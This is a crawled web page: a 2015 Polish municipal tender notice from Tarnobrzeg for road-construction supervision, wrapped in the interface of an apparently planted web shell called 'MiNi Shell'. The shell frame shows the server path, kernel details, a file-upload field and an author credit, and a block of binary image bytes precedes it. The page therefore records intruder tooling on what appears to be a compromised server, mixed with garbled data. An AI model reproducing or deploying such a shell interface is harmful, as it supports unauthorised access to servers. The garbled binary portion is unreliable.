JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150622/91375-N-2015.html

<p class="kh_header"><b>Tarnobrzeg: Pełnienie funkcji inspektora nadzoru inwestorskiego branży drogowej nad realizacją zadania pn: Remont dróg gminnych: Przechodnia, Zgodna, Młynarska, Wałowa, Dąbie, Cicha - etap II, objętych projektem Modernizacja dróg gminnych w Tarnobrzegu w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013.</b><br>
<b>Numer ogłoszenia: 91375 - 2015; data zamieszczenia: 22.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tarnobrzega , ul. Kościuszki 32, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 015 8226570, faks 015 8222504.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego branży drogowej nad realizacją zadania pn: Remont dróg gminnych: Przechodnia, Zgodna, Młynarska, Wałowa, Dąbie, Cicha - etap II, objętych projektem Modernizacja dróg gminnych w Tarnobrzegu w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie zadania pn.: 

Pełnienie funkcji inspektora nadzoru inwestorskiego branży drogowej nad realizacją zadania pn: Remont dróg gminnych: Przechodnia, Zgodna, Młynarska, Wałowa, Dąbie, Cicha - etap II, objętych projektem Modernizacja dróg gminnych w Tarnobrzegu w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013.

1.1 Szczegółowy opis przedmiotu zamówienia 

Przedmiotem zamówienia jest  pełnienie nadzoru inwestorskiego branży drogowej nad realizacją  zadania pn: Wykonanie remontu dróg gminnych: Przechodnia, Zgodna, Młynarska, Wałowa,   Dąbie,  Cicha objętych projektem  Modernizacja dróg gminnych w Tarnobrzegu w ramach RPO WP na lata 2007-2013, w tym:
1.Remont drogi gminnej nr122015 - ul. Przechodnia na odcinku   długości 119 m , w zakresie:
Wykonanie nawierzchni bitumicznej na podbudowie z kruszywa na istniejących zjazdach do posesji prywatnych o nawierzchni tłuczniowej . Zjazdy zostaną wykonane jako bitumiczne w granicach pasa drogowego.
Roboty wykończeniowe: w ramach zniszczonej przy robotach drogowych zieleni i poboczy przewiduje się zahumusowanie i obsianie terenów zielonych , jak również uzupełnienie poboczy kruszywem.
2. Remont drogi gminnej nr 122024 - ul. Zgodna na odcinku długości 117 m, w zakresie:
    Wykonanie nawierzchni z kostki betonowej na istniejących zjazdach o nawierzchni tłuczniowej. Nawierzchnia z kostki brukowej betonowej kolorowej o grubości 8 cm zostanie ułożona na podbudowie z kruszywa łamanego stabilizowanego mechanicznie i podsypce cementowo-piaskowej.
Roboty wykończeniowe : w ramach zniszczonej przy robotach drogowych zieleni i poboczy przewiduje się zahumusowanie i obsianie terenów zielonych , jak również uzupełnienie poboczy kruszywem.
3. Remont drogi gminnej nr 122039 - ul. Młynarska na odcinku długości  276,20 m, w  zakresie :
Wykonanie nawierzchni bitumicznej na podbudowie z kruszywa na istniejących zjazdach o nawierzchni tłuczniowej na  długości 276,20 mb . Zjazdy zostaną wykonane jako bitumiczne w granicach pasa drogowego.
Roboty wykończeniowe : w ramach zniszczonej przy robotach drogowych zieleni i poboczy przewiduje się zahumusowanie i obsianie terenów zielonych , jak również uzupełnienie poboczy kruszywem.
4. Remont drogi gminnej nr 122055 - ul. Wałowa na odcinku długości 1978 m , w zakresie: 
 Remont konstrukcji nawierzchni tłuczniowej na odcinku 0+000 do km 0+900 tj. dł 900 mb poprzez wykonanie warstw bitumicznych na podbudowie z kruszywa.
Remont zjazdów do posesji poprzez wykonanie nowej konstrukcji nawierzchni bitumicznej na uprzednio wyrównanym i zagęszczonym podłożu . 
Wzmocnienie skarp korpusu drogowego na odcinku 1+907 do 1+970 oraz  1+735 do 1+804 po stronie prawej. Wzmocnienie skarp rowów będzie polegało na wyłożeniu ich , w miejscach o nachyleniu 1:1 lub ostrzejszym płytami betonowymi , ażurowymi.
Roboty wykończeniowe : w ramach zniszczonej przy robotach drogowych zieleni i poboczy przewiduje się zahumusowanie i obsianie terenów zielonych , jak również uzupełnienie poboczy kruszywem.


5.  Remont drogi gminnej nr 122018 - ul. Dąbie na odcinku długości 2534,5 m , w zakresie:  
 Wykonanie nawierzchni bitumicznej na warstwie wyrównawczej z kruszywa na odcinku o nawierzchni tłuczniowej - na długości 2.381,5 m.
Remont zjazdów poprzez ułożenie nawierzchni  bitumicznych na warstwie wyrównawczej z kruszywa na istniejących nawierzchniach z kruszywa łamanego wraz z remontem istniejących przepustów pod zjazdami poprzez wymianę rur przelotowych i założenie murków oporowych betonowych.
Odwodnienie korpusu drogowego  poprzez odpowiednie spadki do istniejących rowów .
Wzmocnienie dna rowów płytami betonowymi chodnikowymi o wym. 35x35x6 cm  i skarp rowów poprzez ułożenie prefabrykowanych elementów betonowych .
W ramach zniszczonej przy robotach drogowych zieleni i poboczy przewiduje się zahumusowanie i obsianie terenów zielonych , jak również uzupełnienie poboczy kruszywem. 
6. Remont drogi gminnej nr 122005 - ul. Cicha  na odcinku długości 211,40 m, w zakresie:
Wykonanie nawierzchni bitumicznej na podbudowie z kruszywa na istniejących zjazdach o nawierzchni tłuczniowej na długości 211,4 m. Zjazdy zostaną wykonane jako bitumiczne w granicach pasa drogowego. W celu dopasowania wysokości nawierzchni zjazdów do nawierzchni istniejącej jezdni na każdym zjeździe zostanie wykonane korytowanie.  
 Roboty wykończeniowe : w ramach zniszczonej przy robotach drogowych zieleni i poboczy przewiduje się zahumusowanie i obsianie terenów zielonych , jak również uzupełnienie poboczy kruszywem.
7. Wykonanie i ustawienie w miejscu wskazanym przez Zamawiającego 1 szt. tablicy informacyjnej dla zadania , wg wzoru określonego w wytycznych Instytucji Zarządzającej RPO WP na lata 2007-2013
8. Opis robót objętych nadzorem inwestorskim zawiera Zał.  nr 8 do SIWZ 


2. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994r. prawo budowlane (t.j. Dz. U. z 2013r. poz. 1409 z późn. zm.), ustawie z dnia 23 kwietnia 1964r. Kodeks cywilny ( Dz. U. z 2014 r. poz.121 z późn. zm.) i ustawie z dnia  29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. z 2013 r., poz. 907 z późn. zm.)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje)  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotu na rzecz którego usługa została wykonana , oraz załączeniem dowodów, czy została wykonana lub jest wykonywana należycie  - 2 usługi  polegające na pełnieniu nadzoru inwestorskiego branży drogowej nad realizacją robót  budowlanych polegających  na budowie, rozbudowie, przebudowie, modernizacji  lub remoncie drogi o wartości robót nie mniejszej niż  400   tys. PLN  brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Wykonawca przedstawi wraz z ofertą osobę, na funkcję wymienioną poniżej która spełnia następujące wymagania:
Osoba proponowana do pełnienia funkcji Inspektora nadzoru branży drogowej 
                  musi posiadać doświadczenie   i kwalifikacje w zakresie nie mniejszym niż:
                 - posiada co najmniej 2 letnie doświadczenie w pełnieniu funkcji inspektora nadzoru branży 
                   drogowej na budowie
           - uprawnienia budowlane  do kierowania robotami w specjalności inżynieryjnej drogowej w 
            rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju  z dnia 11 września 
            2014r  w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz.U. z 2014 roku, poz. 
            1278 z późniejszymi zmianami ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Ilość wizyt kontrolnych na placu budowy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający przewiduje  możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku:
1.1 Skrócenia albo wydłużenia terminu wykonania przedmiotu Umowy, wyłącznie z przyczyn  niezależnych od Wykonawcy i mających wpływ na wykonanie przedmiotu umowy, w przypadku zaistnienia następujących okoliczności:
a)	siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności; zmiana terminu realizacji o liczbę dni oddziaływania zdarzenia zewnętrznego,
b)	 wezwania przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy o czas niezbędny na uzupełnienie,
c)	przekroczenia przewidzianych przepisami prawa terminów trwania procedur administracyjnych, liczonych zgodnie z zasadami określonymi w kodeksie postępowania administracyjnego; zmiana terminu realizacji o liczbę dni przekroczenia przewidzianych przepisami prawa terminów, 
d)	szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych do umowy; zmiana terminu realizacji o liczbę dni ich pozyskania,
e)  zmiany przepisów prawa,
f)	udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego, od których wykonania uzależnione jest wykonanie zamówienia podstawowego, jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy. W takim przypadku termin wykonania zamówienia podstawowego może być przesunięty o czas niezbędny na zlecenie i wykonanie zamówienia dodatkowego lub zamiennego,
g) wydania polecenia zmiany,
1.2 Zamawiający jest uprawniony do zawieszenia wykonania umowy w takim czasie i w taki sposób, w jaki uważa to za konieczne. Zawieszenie następuje na podstawie pisemnego powiadomienia doręczonego Wykonawcy najpóźniej na 14 dni przed terminem zawieszenia. Jeżeli okres zawieszenia przekracza 60 dni i zawieszenie nie wynika z nie wywiązywania się z płatności przez Zamawiającego, to Wykonawca może, zawiadamiając Zamawiającego, domagać się zezwolenia na wznowienie wykonania umowy w terminie 30 dni lub rozwiązać umowę, z zachowaniem 14 dniowego okresu wypowiedzenia, 
1.3 Zmniejszenia zakresu przedmiotu umowy wraz z ograniczeniem należnego wykonawcy wynagrodzenia, 
2. Zamawiający ma prawo jednostronnie zobowiązać wykonawcę do dokonania następujących zmian w przedmiocie umowy (polecenie zmiany):
a) pominąć element przedmiotu umowy,
2.1 Przed wydaniem polecenia zmiany Zamawiający może zobowiązać Wykonawcę do przedłożenia w określonym terminie stanowiska w zakresie:
a) uzasadnienia dokonania zmiany,
b)	opisu działań, czynności i opracowań niezbędnych do realizacji przedmiotu umowy objętego poleceniem zmiany
c)	zmiany wynagrodzenia - w przypadku zaistnienia okoliczności określonej w § 12 w ust. 2 pkt. a wzoru umowy,
2.2 Zamawiający, po ewentualnym otrzymaniu od Wykonawcy stanowiska w zakresie polecenia zmiany, jest uprawniony do wydania polecenia zmiany. 
3. O zmianach teleadresowych, zmianach rachunku bankowego i tym podobnych Wykonawca powiadomi pisemnie Zamawiającego. Takie zmiany nie wymagają sporządzenia aneksu do umowy. 
4. Strony dopuszczają możliwość zmiany na etapie realizacji umowy podmiotów trzecich,                 o których mowa w art. 26 ust. 2b ustawy Prawo zamówień publicznych, za pomocą których Wykonawca wykazał spełnianie warunków udziału w postępowaniu. W takim przypadku zaproponowany nowy podwykonawca, zobowiązany jest wykazać spełnianie warunków  w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego dotychczasowy podwykonawca. Zmiana taka nie wymaga zawarcia aneksu do umowy. 
5. Wszelkie zmiany i uzupełnienia niniejszej umowy będą dokonywane wyłącznie na  piśmie w formie aneksu do umowy za zgodą obydwu STRON (za wyjątkiem tych opisanych  w pkt. 3 i 4).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnobrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnobrzega
ul. Mickiewicza 7 pok 6
39-400 Tarnobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2015 godzina 10:00, miejsce: Kancelaria Ogólna
Urząd Miasta Tarnobrzega
ul. Mickiewicza 7
39-400 Tarnobrzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego branży drogowej nad realizacją zadania pn: Remont dróg gminnych: Przechodnia, Zgodna, Młynarska, Wałowa, Dąbie, Cicha - etap II, objętych projektem Modernizacja dróg gminnych w Tarnobrzegu  w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com